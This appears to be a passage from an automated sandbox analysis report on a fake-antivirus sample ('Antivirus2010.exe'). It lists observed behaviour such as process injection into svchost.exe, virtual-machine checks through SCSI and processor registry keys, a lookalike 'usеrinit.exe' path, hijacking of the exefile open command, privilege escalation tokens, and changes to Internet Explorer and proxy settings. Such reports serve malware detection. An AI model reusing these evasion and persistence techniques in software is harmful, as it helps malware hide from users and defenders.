File opened (read-only) \??\X: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\svchost.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum C:\Windows\system32\svchost.exe N/A
Key value enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum C:\Windows\system32\svchost.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT \??\globalroot\systemroot\system32\usеrinit.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2124 set thread context of 1724 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe C:\Windows\SysWOW64\cmd.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet002\Enum\SCSI C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet002\Enum\SCSI\Disk&Ven_Dell&Prod_VIRTUAL_DISK C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\system32\svchost.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet002\Enum\SCSI C:\Windows\system32\svchost.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Windows\system32\svchost.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\svchost.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Windows\system32\svchost.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter C:\Windows\system32\svchost.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral C:\Windows\system32\svchost.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses C:\Windows\system32\svchost.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 C:\Windows\system32\svchost.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 C:\Windows\system32\svchost.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus C:\Windows\system32\svchost.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000 C:\Windows\system32\svchost.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1 C:\Windows\system32\svchost.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 C:\Windows\system32\svchost.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 C:\Windows\system32\svchost.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0 C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1 C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2 C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController C:\Windows\system32\svchost.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus C:\Windows\system32\svchost.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 C:\Windows\system32\svchost.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2 C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor C:\Windows\system32\svchost.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor C:\Windows\system32\svchost.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 C:\Windows\system32\svchost.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral C:\Windows\system32\svchost.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000 C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses C:\Windows\system32\svchost.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0 C:\Windows\system32\svchost.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 C:\Windows\system32\svchost.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0 C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0 C:\Windows\system32\svchost.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 C:\Windows\system32\svchost.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 C:\Windows\system32\svchost.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 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 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7EC7A6A1-D8E5-11EE-BEEC-D20227E6D795} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 90de7553f26cda01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e861098c19b4244d8627ee4664a96069000000000200000000001066000000010000200000007e24c37093847c92a5cea8828a9b9169c33e42a915fca012df3ae3e6a3448679000000000e80000000020000200000003c5d8c915dd416dba54cd572cb49441b0cb3a14a00a3a21b8fbf6c22e830a68a20000000f0b19839142c4be440857e7c64b19a633b3f332ea89441644e8813db0382bdfb40000000ef37381f87dc6825d3cad41c703aa26c22bb41f58de3051179dfc655956f132ee005d8b03f159aabb87408615296a61703d98ff8ab26306e98e9bb9b6fedeef1 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\e6-fb-04-fa-e0-00\WpadDecision = "0" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\Main \??\globalroot\systemroot\system32\usеrinit.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{18EF7846-4696-419F-A2FA-D996D7DAE5D2}\WpadNetworkName = "Network 3" C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" \??\globalroot\systemroot\system32\usеrinit.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{18EF7846-4696-419F-A2FA-D996D7DAE5D2}\WpadDecision = "0" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\e6-fb-04-fa-e0-00 C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\svchost.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\system32\svchost.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{18EF7846-4696-419F-A2FA-D996D7DAE5D2}\WpadDecisionTime = a0d5a40ef26cda01 C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{18EF7846-4696-419F-A2FA-D996D7DAE5D2}\WpadDecisionReason = "1" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{18EF7846-4696-419F-A2FA-D996D7DAE5D2}\e6-fb-04-fa-e0-00 C:\Windows\system32\svchost.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\e6-fb-04-fa-e0-00\WpadDecisionTime = a0d5a40ef26cda01 C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{18EF7846-4696-419F-A2FA-D996D7DAE5D2} C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\e6-fb-04-fa-e0-00\WpadDecisionReason = "1" C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\system32\svchost.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00fd000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" C:\Windows\system32\svchost.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ \??\globalroot\systemroot\system32\usеrinit.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" \??\globalroot\systemroot\system32\usеrinit.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \registry\machine\Software\Classes\Interface\{2ea8c9d4-7b76-aecf-38db-17f923ffdd55} C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2ea8c9d4-7b76-aecf-38db-17f923ffdd55}\u = "3" C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe N/A
Key created \registry\machine\Software\Classes\Interface\{507e1fac-b73d-1bbf-56af-f783afcbf39c} C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"exefile\" /shell <%1> %*" C:\Windows\system32\svchost.exe N/A
Key created \registry\machine\Software\Classes\Wow6432Node\Interface\{2ea8c9d4-7b76-aecf-38db-17f923ffdd55} C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{2ea8c9d4-7b76-aecf-38db-17f923ffdd55}\u = "3" C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe N/A
Token: SeDebugPrivilege N/A \??\globalroot\systemroot\system32\usеrinit.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeAuditPrivilege N/A N/A N/A
Token: SeAssignPrimaryTokenPrivilege N/A N/A N/A
Token: SeIncreaseQuotaPrivilege N/A N/A N/A
Token: SeSecurityPrivilege N/A N/A N/A
Token: SeTakeOwnershipPrivilege N/A N/A N/A
Token: SeLoadDriverPrivilege N/A N/A N/A
Token: SeRestorePrivilege N/A N/A N/A
Token: SeSystemEnvironmentPrivilege N/A N/A N/A
Token: SeAssignPrimaryTokenPrivilege N/A N/A N/A
Token: SeIncreaseQuotaPrivilege N/A N/A N/A
Token: SeSecurityPrivilege N/A N/A N/A
Token: SeTakeOwnershipPrivilege N/A N/A N/A
Token: SeLoadDriverPrivilege N/A N/A N/A
Token: SeSystemtimePrivilege N/A N/A N/A
Token: SeBackupPrivilege N/A N/A N/A
Token: SeRestorePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeSystemEnvironmentPrivilege N/A N/A N/A
Token: SeUndockPrivilege N/A N/A N/A
Token: SeManageVolumePrivilege N/A N/A N/A
Token: SeAssignPrimaryTokenPrivilege N/A N/A N/A
Token: SeIncreaseQuotaPrivilege N/A N/A N/A
Token: SeSecurityPrivilege N/A N/A N/A
Token: SeTakeOwnershipPrivilege N/A N/A N/A
Token: SeLoadDriverPrivilege N/A N/A N/A
Token: SeRestorePrivilege N/A N/A N/A
Token: SeSystemEnvironmentPrivilege N/A N/A N/A
Token: SeAssignPrimaryTokenPrivilege N/A N/A N/A
Token: SeIncreaseQuotaPrivilege N/A N/A N/A
Token: SeSecurityPrivilege N/A N/A N/A
Token: SeTakeOwnershipPrivilege N/A N/A N/A
Token: SeLoadDriverPrivilege N/A N/A N/A
Token: SeRestorePrivilege N/A N/A N/A
Token: SeSystemEnvironmentPrivilege N/A N/A N/A
Token: SeAssignPrimaryTokenPrivilege N/A N/A N/A
Token: SeIncreaseQuotaPrivilege N/A N/A N/A
Token: SeSecurityPrivilege N/A N/A N/A
Token: SeTakeOwnershipPrivilege N/A N/A N/A
Token: SeLoadDriverPrivilege N/A N/A N/A
Token: SeSystemtimePrivilege N/A N/A N/A
Token: SeBackupPrivilege N/A N/A N/A
Token: SeRestorePrivilege N/A N/A N/A
